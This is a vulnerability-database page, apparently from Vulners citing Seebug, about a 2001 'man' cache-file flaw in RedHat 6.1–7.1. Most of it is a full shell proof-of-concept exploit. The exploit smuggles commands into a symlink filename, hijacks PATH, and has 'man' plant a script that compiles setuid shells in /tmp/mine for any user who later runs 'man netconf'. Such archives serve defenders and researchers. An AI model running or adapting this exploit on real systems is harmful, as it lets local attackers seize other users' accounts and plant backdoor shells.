Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 12 Views

RedHat Man Cache File Vulnerabilit

Code

                                                source: http://www.securityfocus.com/bid/2815/info
 
A vulnerability exists in the 'man' system manual pager program.
 
It is possible for local users to cause man to cache files in the system cache directory from outside of the configured manual page hierarchy search path.
 
Combined with the behaviours of 'man' and 'mandb' or any other utilities which trust cache filenames, it may be possible to use this vulnerability to elevate privileges.

#!/bin/sh
###################################################
# Fri May 18 22:08:42 JAVT 2001                   #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs            #
# proof of concept.                               #
# version affected:                               #
#   <= man-1.5h1-20                               #
#                                                 #
# tested on:                                      #
#  redhat7.1 -> any user suidshell                #
#                                                 #
# by jenggo <[email protected]>                      #
#                                                 #
# thanx to: echo, mayonaise all @ #karet          #
###################################################
# hmmm ... ada yang bisa modif jadi instant root ?? :P

# IMPORTANT !
# set this to command that has no man page
DEADLY_BIN="netconf"

# on <= redhat6.2 could be /var/cache/catman
CACHEDIR="/var/cache/man"
CACHEDIR2="/var/cache/catman"

GZ="/bin/gzip"

echo -n "check man dir ..."

if [ ! -d $CACHEDIR ]; then
  if [ -d $CACHEDIR2 ]; then
    CACHEDIR=$CACHEDIR2
    echo "OK"
  else
    echo "FAILED"
    echo "check your man dir"
    exit
  fi
else
  echo "OK"
fi 

echo -n "checking sgid/suid man ..."
if [ ! -g /usr/bin/man ]; then
# is it a debian man?
  if [ -d /usr/lib/man-db ]; then
    echo "FAILED"
    echo "I think this is debian style man, use other script"
  else
    echo "FAILED"
    echo "can't find executables sgid man binary"
  fi
  exit
else
  echo "OK"
fi

echo "making our man directory ..."
echo 

mkdir -p /tmp/man/man1
mkdir /tmp/cat1
mkdir /tmp/mine
chmod 777 /tmp/mine

echo "creating our man page ..."
echo 

echo "BEBAS EUY"|$GZ -c > /tmp/man/man1/huhuy.1.gz

echo "creating symlink ..."
echo 

ln -s "$CACHEDIR/cat1/netconf.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" /tmp/cat1/huhuy.1.gz

echo "creating our bogus command ..."
echo 
touch /tmp/huhuy

echo "making manx shellscript"
echo 

/bin/cat > /tmp/mine/manx <<EOF
#!/bin/sh

export PATH="/bin:/usr/bin:/sbin:/usr/sbin"
VICTIM=\`/usr/bin/id -u\`

/bin/cat >/tmp/mine/my"\$VICTIM".c <<EOG
#include <stdio.h>
void main()
{
  char *hh[2]={"/bin/sh", NULL};
  setreuid(\$VICTIM,\$VICTIM);
  execve(hh[0], hh, NULL);
}
EOG

/usr/bin/gcc /tmp/mine/my"\$VICTIM".c -o /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null

/bin/rm -f /tmp/mine/my"\$VICTIM".c 1>/dev/null 2>/dev/null

chmod 6755 /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null

EOF

chmod 755 /tmp/mine/manx

if [ ! -x /tmp/mine/manx ]; then
  echo "file: /tmp/mine/manx can't be set executable !"
  echo "fix the exploit first"
  echo "cleaning up ..."
  /bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
  exit
fi

echo "prepare to exploit ..."
echo 

export PATH=../../../../../../tmp
cd /

echo "exploiting ..."
echo 

/usr/bin/man -d huhuy 2>/dev/null

export PATH=/bin:/usr/bin

echo "checking our exploit result"
echo 

if [ -f "/var/cache/man/cat1/$DEADLY_BIN.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" ]; then
  echo "content of $CACHEDIR/cat1:"
  ls -l $CACHEDIR/cat1
  echo
  echo "exploit OK, now wait till somebody run 'man $DEADLY_BIN'"
  echo "and your suidshells will be waiting at /tmp/mine/* :)"
  echo "bye."
  echo "[-------- jenggo <[email protected]> --------]"
  echo
else
  echo "hrrmm ... exploit failed to create offending file !"
  echo "check again please"
  echo "cleaning up ..."
  /bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
fi

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
vulnerabilityman programcache filesprivilege elevationredhat 6.1redhat 6.2redhat 7.0redhat 7.1local userssystem cache directory
12